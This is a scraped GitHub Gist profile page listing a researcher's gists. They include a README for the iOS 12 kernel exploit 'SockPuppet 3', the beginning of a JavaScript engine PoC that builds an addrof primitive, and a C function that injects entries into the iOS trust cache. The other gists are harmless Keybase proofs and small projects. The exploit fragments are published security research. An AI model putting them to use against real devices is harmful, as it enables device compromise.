Skip to content

Instantly share code, notes, and snippets.

View ur0's full-sized avatar

Umang Raghuvanshi ur0

113 followers · 4 following
View GitHub Profile
@ur0
ur0 / README.md
Last active June 13, 2024 00:24
SockPuppet 3

SockPuppet 3

This is a kernel exploit targeting iOS 12.0-12.2 and 12.4. It exploits a dangling kernel pointer to craft a fake task port corresponding to the kernel task and gets a send right to it.

This code is not readily compilable — some common sense is a prerequisite. If you do get it going though, it is extremely reliable on any device with more than a gigabyte of RAM. Interested readers may want to investigate how reallocations can be prevented -- this might improve reliability even more.

License

@ur0
ur0 / keybase.md
Created September 3, 2019 14:45

Keybase proof

I hereby claim:

  • I am ur0 on github.
  • I am ur0 (https://keybase.io/ur0) on keybase.
  • I have a public key ASASnDpm7wLSkot2L9UxGIPFsiY9NrDA9r3KJUHZ9X7zswo

To claim this, I am signing this object:

@ur0
ur0 / pepsiPoc.js
Last active August 8, 2019 05:23 — forked from pepsipu/pepsiPoc.js
poc provided by Lucas
load("utils.js")
load("int64.js")
function addrof(obj) {
let dateObj = new Date();
dateObj[0] = 1;
let array = new Array(13.37, 13.37)
let triggerChange = false;
Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, {
@ur0
ur0 / inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
Created February 21, 2019 15:44 — forked from Proteas/inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
void inject_trusts(int pathc, const char *paths[])
{
printf("[+] injecting into trust cache...\n");
extern uint64_t g_kern_base;
static uint64_t tc = 0;
if (tc == 0) {
// loaded_trust_caches: 0xFFFFFFF008F702C8
tc = g_kern_base + (0xFFFFFFF008F702C8 - 0xFFFFFFF007004000);
@ur0
ur0 / keybase.md
Created January 27, 2019 17:42

Keybase proof

I hereby claim:

  • I am ur0 on github.
  • I am ur0 (https://keybase.io/ur0) on keybase.
  • I have a public key ASDW1ULsmHNKf-ZfvdeEXiotp530spI3RGjFhUmEHUH2Zwo

To claim this, I am signing this object:

@ur0
ur0 / test.md
Created October 5, 2017 15:05

DotATranslator (v2)

This is DotA translator, a utility which translates DotA 2 text chat into your favourite language (and pops the results back into the chat pane). It works in all game modes (even in regular matchmaking!).

Screenshots

I don't have pictures playing with humans because I'm unable to exit Visual Studio (send help!).

@ur0
ur0 / 1.gpg.txt
Last active March 1, 2017 04:27
-----BEGIN PGP ARMORED FILE-----
Comment: Use "gpg --dearmor" for unpacking
hQEMA8vKk93IVNa3AQgAn8qj7v732q/FKhINhmJbbzdsyh6n4MYHo4LwVE52d6cC
5KjLDl165gar5L3usMsKzRjACkXfiIRXFtN6H7Jyw7t1/TFiZQZnK9ojn6fA49Om
epdJgA0LSudVGcirZRtHbddUEqRU5LeGRV5swf48G++azTVVL/plxbgOMi3Ijwff
+4QTMNLzYrMZ9nybt4jR4rCUgeZVYez/rfsNl6RUTd1zq/kUvquKpcJn1lf9nk8O
YENzkwjV/O5ArPt8Ws1474WmuckEGg9WgMZI82ArmQ8R1hsPHhwWLTlWJQSRWECD
zn7bXAbZ9K/d2O1itnlAu5lWcTP+FWMM56KhxW+l59LsAdfq3x9Hej5ax+hqJFPg
TMzzoAfBihQN3fmsGp1W3I8AvVppq7zRTWhfFDHSFKxRaYQdGyQPsTzhFA1MThUT
@ur0
ur0 / GetMapObjs
Created August 4, 2016 00:25
100 {
1 {
1: 4316619627372216320
2: 1470268521140
}
1 {
1: 4316619629519699968
2: 1470268521140
}
1 {
@ur0
ur0 / keybase.md
Last active March 2, 2018 11:07

Keybase proof

I hereby claim:

  • I am ur0 on github.
  • I am ur0 (https://keybase.io/ur0) on keybase.
  • I have a public key whose fingerprint is E127 100C 0422 108D A2D9 2C1B 7509 4191 5E1C 9375

To claim this, I am signing this object:

@ur0
ur0 / application_helper.rb
Created October 4, 2015 10:04
Statusify
module ApplicationHelper
def all_incidents
Incident.all.order('updated_at DESC')
end
def visible_incidents
@visible_incidents = []
if signed_in?
@visible_incidents = all_incidents.to_a